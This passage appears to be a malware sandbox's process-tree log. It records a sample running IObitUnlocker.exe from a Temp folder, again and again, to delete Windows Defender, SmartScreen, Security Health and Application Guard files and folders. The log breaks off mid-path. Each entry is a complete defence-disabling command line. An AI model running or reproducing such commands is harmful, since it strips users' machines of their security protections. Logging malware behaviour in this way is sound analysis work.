                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                  PID:6360
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                    PID:6644
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                      PID:6984
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                        PID:6968
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                          PID:6320
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                            PID:6568
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                              PID:6812
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                PID:7104
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                  PID:6188
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                    PID:6524
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 